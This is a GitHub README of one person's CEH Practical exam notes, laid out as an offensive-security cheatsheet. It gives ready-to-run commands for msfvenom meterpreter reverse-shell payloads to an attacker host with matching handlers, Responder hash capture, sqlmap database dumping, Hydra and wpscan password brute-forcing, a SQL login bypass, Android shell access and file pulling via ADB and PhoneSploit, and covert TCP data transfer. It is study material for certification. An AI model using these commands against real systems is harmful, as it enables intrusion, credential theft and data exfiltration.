/CEH-Practical-Notes-and-Tools

My Personal Notes that I used on the Exam as a Cheatsheet

Primary LanguageCMIT LicenseMIT

CEH-Practical-Notes-and-Tools

Successfully completed the CEH (Practical) exam by EC-Council with a score of 20/20! Took me around 2 hours 20 minutes to complete the 6 hour Proctored exam.

Just a typical CTF Player/Hacker going back to Basics 💻

My Personal Notes that I used on the Exam as a Cheatsheet

Network Hacking

Netdiscover

Netdiscover

  • Scan Entire Network for ALive host using ARP
netdiscover -i eth0
netdiscover -r x.x.x.1/24
Nmap

Nmap

  • To scan the live Host
nmap -sP x.x.x.1/24                 
nmap -sn x.x.x.1/24
  • To find the Specific open port
nmap -p port x.x.x.1/24 --open
  • To find the OS
nmap -O x.x.x.x 
  • Comprehensive Scan
nmap -Pn -A x.x.x.1/24 -vv --open   
Wireshark

Wireshark

  • Wireshark provides the feature of reassembling a stream of plain text protocol packets into a human-readable format
  select_packet > follow > TCP Stream
  • To the get the specific method like ( post , get )
http.request.method==post
http.request.method==get
  • To the Find DOS & DDOS
  • go to Statistics and Select Conversations , sort by packets in IPv4 based on number of Packets transfer
Statistics > Conversations > IPv4 > Packets
Covert TCP

Covert TCP

  • covert_TCP
  • In this we have to use Covert TCP technique to analyses the pcapng file.
  • Traverse though each line in Wireshark and concentrate on Identification field, keep an eye on Hex value and ANSI value.
  • Compile the Code
cc -o covert_tcp covert_tcp.c
  • Reciever Machine(Client_IP)
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 9999 -dest_port 8888 -server -file recieve.txt
  • Sender Machine(Attacker_IP)
  • Create A Message file that need to be transferred Eg: secret.txt
sudo ./covert_tcp -dest Client_IP -source Attacker_IP -source_port 8888 -dest_port 9999 -file secret.txt
  • Secret message sent using Covert_TCP and it is captured using Wireshark - Pcap_of_Covert
  • The Secret text is -> Hello This 123 -
LLMNR/NBT

LLMNR/NBT-NS Poisoning

  • Responder - rogue authentication server to capture hashes.

  • This can be used to get the already logged-in user's password, who is trying to access a shared resource which is not present.

  • In Parrot/Kali OS,

responder -I eth0  
  • In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB
  • To crack that hash, use JohntheRipper
john SMBfilename  
Common Ports

Common Port

  • 21 - FTP
  • 22 - SSH
  • 23 - TELNET
  • 3306 - MYSQL
  • 389,3389 - RDP
Port Login

Port Login

  • FTP Login
  ftp x.x.x.x
  • SSH Login
  ssh username@x.x.x.x
  • TELNET Login
  telnet x.x.x.x

Web Hacking

Nslookup
  • To verify Website's Ip
Nslookup wwww.example.com
File Upload

File Upload Vulnerability

  • To create a PHP Payload
  • Copy the PHP code and create a .php
msfvenom -p php/meterpreter/reverse_tcp lhost=attacker-ip lport=attcker-port -f raw
  • To create a Reverse_tcp Connection
msfconsole
use exploit/multi/handler
set payload php/meterepreter/reverse_tcp
set LHOST = attacker-ip
set LPORT = attcker-port
run
  • To find the secret file
  type C:\wamp64\www\DVWA\hackable\uploads\Hash.txt
SQL Injection

SQL Injection

  • Login bypass with [' or 1=1 --]

DSSS

  • Damn Small SQLi Scanner (DSSS) is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters)

  • As of optional settings it supports HTTP proxy together with HTTP header values User-Agent, Referer and Cookie.

python3 dsss.py -u "url" --cookie="cookie"
  • Open the binded URL

SQLMAP

  • List databases, add cookie values
  sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --dbs 
  • OR
  sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low”   --data="id=1&Submit=Submit" --dbs  
  • List Tables, add databse name
  sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name --tables  
  • List Columns of that table
  sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --columns
  • Dump all values of the table
  sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --dump

System Hacking

System

System

  • To create a Payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=attacker_IP LPORT=attacker_Port -o filename.exe 
  • To take a reverse TCP connection from windows
msfdb init && msfconsole 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST= attacker-IP  
set LPORT= attacker-Port 
run

Android Hacking

ADB

ADB

  • To Install ADB
apt-get update
sudo apt-get install adb -y
adb devices -l
  • Connection Establish Steps
adb connect x.x.x.x:5555
adb devices -l
adb shell  
  • To navigate
pwd
ls
cd Download
ls
cd sdcard
  • Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop
PhoneSploit

PhoneSploit tool

  • To install Phonesploit
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
OR
python3 -m pip install colorama
  • To run Phonesploit
python3 phonesploit.py
  • Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
  • Type 4, to Access Shell on phone
  • Download File using PhoneSploit
9. Pull Folders from Phone to PC
  • Enter the Full Path of file to Download
sdcard/Download/secret.txt

Password Cracking

Wpscan

Wordpress

  • Wordpress site only Users Enumeration
wpscan --url http://example.com/ceh --enumerate u
  • Direct crack if we have user/password detail
wpscan --url http://x.x.x.x/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://x.x.x.x:8080/CEH -u <user> -P ~/wordlists/password.txt
Hydra

Hydra

SSH

hydra -l username -P passlist.txt x.x.x.x ssh

FTP

hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x
  • If the service isn't running on the default port, use -s
hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x -s 221
  • FTP Get command
  • Used to download the specific file from FTP to attacker or local machine
get flag.txt ~/Desktop/filepath/flag.txt
get flag.txt .

TELNET

hydra -l admin -P passlist.txt -o test.txt x.x.x.x telnet

Steganography

Snow

Snow

  • Whitespace Steganography using Snow
  • To hide the Text
SNOW.EXE -C -p test -m "Secret Message" original.txt hide.txt
  • To unhide the Hidden Text
SNOW.EXE -C -p test hide.txt
CrypTool

CrypTool

  • To Encrypt
  • Use Key 05
  • To Decrypt
HashCalc

HashCalc

  • HashCalc Interface.
  • Create a text file.
  • Choose text file.
  • Hash Value of text file.
  • Modify the text inside the file.
  • Compare the hash, It will vary.
HashMyFile

HashMyFile

  • HashMyFile Application
  • add folder to Hash the file presented in Folder
  • After Hash the file
  • Add More Hashing Format
MD5 Calculator
## MD5 Calculator  
  • Create a text file contains "Hello" and save it, Right click the file to compare hash.
  • MD5 Hash of text file
VeraCrypt

VeraCrypt

BCTextEncoded

BCTextEncoded

Keywords

Keywords

  • Img hidden - Openstego
  • .hex - Cryptool
  • Whitespace - SNOW
  • MD5 - Hashcalc & MD5 Calculator
  • Encoded - BCTexteditor
  • Volume & mount - Veracrypt

File Transfer

File Transfer

File Transfer

Linux to Windows

  • used to send a payload by Apache
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /root/Desktop/filename /var/www/html/share/
  • to start and verify
service apache2 start 
service apache2 status
  • to Download from Windows
  • Open browser
IP_OF_LINUX/share

Windows to Linux

  • File system > Network > smb///IP_OF_WINDOWS

Resource

Course

Course

TryHackMe

TryHackMe

Learning Path

Rooms

Useful Links

Links

  • hash.com is a online hash Identifier and Cracker

Final Words: Grab a cup of Tea ☕ and GRIND!!!